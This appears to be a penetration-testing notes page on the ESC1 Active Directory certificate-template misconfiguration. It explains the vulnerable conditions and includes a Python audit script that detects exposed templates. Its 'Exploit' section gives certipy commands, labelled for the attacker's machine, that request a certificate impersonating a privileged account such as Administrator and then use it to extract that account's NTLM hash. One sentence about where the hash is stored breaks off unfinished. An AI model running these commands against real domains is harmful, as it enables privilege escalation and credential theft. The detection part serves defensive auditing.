ESC1

TL;DR

ESC1 lets a low-privileged domain account request a certificate in the name of any enabled privileged domain account, then use that certificate for Kerberos client authentication as that account.

A template is vulnerable to ESC1 when it permits Client Authentication and lets the enrolling account supply an arbitrary Subject Alternative Name (SAN).

A certificate template with the following configuration is vulnerable to ESC1:

  • The Enterprise CA grants low-privileged users enrollment rights (commonly 'Authenticated Users').

  • Manager approval is disabled.

  • No authorized signatures are required.

  • An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.
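The conditions above map directly onto attributes of the template object in AD. The following is an added audit example, not code from the original page or from Certipy: it evaluates constructed template records against every ESC1 condition and reports which ones hold. The `enroll_principals` field is an assumption standing in for the principals already resolved from the template's security descriptor.

```python
# Added example (not part of the original page): flags templates meeting every
# ESC1 condition above, from their LDAP attributes. Records are constructed;
# `enroll_principals` is assumed pre-resolved from the template's security descriptor.

# Bit flags (MS-CRTD) in msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester chooses subject/SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # manager approval required

# EKU OIDs that let the issued certificate authenticate a Kerberos client
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose Enroll right exposes the template to any domain account
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def allows_client_auth(ekus):
    # An empty EKU list means "no restriction", which also permits authentication.
    return not ekus or bool(AUTH_EKUS & set(ekus))


def assess_esc1(tpl):
    """Return (vulnerable, conditions_met) for one pKICertificateTemplate record."""
    met = []
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject (arbitrary SAN)")
    if allows_client_auth(tpl.get("pKIExtendedKeyUsage", [])):
        met.append("EKU permits client authentication")
    if not tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("manager approval disabled")
    if tpl["msPKI-RA-Signature"] == 0:
        met.append("no authorized signatures required")
    if LOW_PRIV & tpl["enroll_principals"]:
        met.append("low-privileged principals hold Enroll")
    return len(met) == 5, met  # every condition must hold for ESC1


def audit(templates):
    """Names of ESC1-vulnerable templates, in input order."""
    return [name for name, tpl in templates.items() if assess_esc1(tpl)[0]]


# Constructed sample: one exposed template, one identical except for approval
BASE = {"msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_principals": {"Authenticated Users"}}
TEMPLATES = {"VulnTemplate": BASE, "ApprovedUser": {**BASE, "msPKI-Enrollment-Flag": 0x2}}
```

Turning on manager approval (or removing the Enroll right from broad groups) is enough to take a template out of the ESC1 result set, which is what the second record shows.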

Exploit

Start by requesting a certificate using any controlled domain account, with the -upn flag specifying any enabled privileged account. This command outputs a .pfx file.

Linux (Attacker)
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template] -upn [target account]@[domain]

Use the .pfx file to authenticate to the domain controller using Kerberos, allowing you to obtain the NTLM hash for the privileged account.

Linux (Attacker)
certipy auth -pfx [.pfx from above] -dc-ip [DC IP]

The NTLM hash is stored within

Example

Linux (Attacker)
certipy req -username [email protected] -password password123 -ca weelee-DC-CA -target ca.weelee.zip -template VulnTemplate -upn [email protected] -dns dc.weelee.zip

certipy auth -pfx Administrator.pfx -dc-ip 10.10.10.10
